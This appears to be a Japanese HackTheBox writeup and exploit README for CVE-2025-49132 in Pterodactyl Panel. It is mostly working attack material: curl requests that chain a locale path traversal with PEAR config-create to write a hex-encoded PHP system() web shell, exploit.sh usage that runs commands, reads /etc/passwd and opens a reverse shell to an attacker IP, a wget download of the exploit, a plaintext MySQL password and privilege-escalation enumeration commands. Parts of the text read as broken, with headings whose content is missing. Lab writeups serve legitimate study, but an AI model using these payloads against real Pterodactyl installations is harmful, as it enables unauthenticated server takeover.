
CVE-2025-49132 を標的とする Pterodactyl Panel のエクスプロイトで、パストラバーサルと PEAR コマンドインジェクションを組み合わせ、認証なしでのリモートコード実行を可能にします。コマンド実行、リバースシェル、権限昇格のガイダンスのための bash および Python スクリプトが含まれています。
HTB Season 10 - Pterodactyl マシンの writeup
ターゲット: Pterodactyl HTB マシン (中程度の難易度)
CVE: CVE-2025-49132
深刻度: Critical (CVSS 9.8)
攻撃タイプ: 認証なしリモートコード実行
影響を受けるバージョン: Pterodactyl Panel < v1.11.11
このエクスプロイトチェーンは以下を組み合わせます:
Pterodactyl Panel の /locales/locale.json エンドポイントは、locale パラメータを通じてパストラバーサルを許可します:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
これは PEAR の pearcmd.php と組み合わせることで:
/tmp に書き込むPEAR (PHP Extension and Application Repository) には CLI ツール (pearcmd.php) があり、次の特徴があります:
config-create コマンドがあるエクスプロイトチェーン:
パストラバーサル → pearcmd.php の読み込み → config-create 経由で PHP を注入 → 悪意のある PHP を実行
コマンドは hex2bin() を使用して 16 進数エンコードされ、以下をバイパスします:
例:
Command: whoami
Hex: 77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>
方法 1: 提供された exploit.sh を使用
chmod +x exploit.sh
# Get user flag
./exploit.sh flag
# Execute commands
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Reverse shell
nc -lvnp 4444 # On attacker machine
./exploit.sh shell 10.10.14.21 4444
方法 2: 手動エクスプロイト
# Step 1: Write PHP shell (hex-encoded "whoami")
curl -g "http://panel.pterodactyl.htb/locales/locale.json?\
+config-create+/&\
locale=../../../../../../usr/share/php/PEAR&\
namespace=pearcmd&\
/<?=system(hex2bin('77686f616d69'))?>+/tmp/shell.php"
# Step 2: Execute
curl "http://panel.pterodactyl.htb/locales/locale.json?\
locale=../../../../../tmp&\
namespace=shell"
方法 3: Python スクリプト
exploit.py を追加しました
**requests をインストール**
フル機能の bash エクスプロイト
./exploit.sh cmd "whoami" # Execute single command
./exploit.sh shell 10.10.14.21 4444 # Reverse shell
./exploit.sh flag # Find user flag
機能:
包括的な技術ドキュメント
以下を含む:
# 1. Add to /etc/hosts
echo "10.10.x.x pterodactyl.htb panel.pterodactyl.htb" | sudo tee -a /etc/hosts
# 2. Download exploit
wget https://your-repo/exploit.sh
chmod +x exploit.sh
# 3. Get shell
nc -lvnp 4444 # Terminal 1
./exploit.sh shell 10.10.14.21 4444 # Terminal 2
# 4. Get user flag
cat /home/phileasfogg3/user.txt
# Check running services
ss -tlnp
# Found:
# 127.0.0.1:3306 - MySQL (root)
# 127.0.0.1:6379 - Redis
# 127.0.0.1:9000 - PHP-FPM (root)
# 127.0.0.1:25 - Postfix
# Check sudo
sudo -l
# (Likely requires password)
# SUID binaries
find / -perm -4000 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
mysql -u pterodactyl -pPteraPanel
# Check for UDF injection, file write perms
# Check for FPM exploitation (CVE-2019-11043 or config abuse)
# Check for auth bypass, RCE via cron
redis-cli -h 127.0.0.1
find /etc/cron* -writable 2>/dev/null
uname -a
# Check for DirtyCow, etc.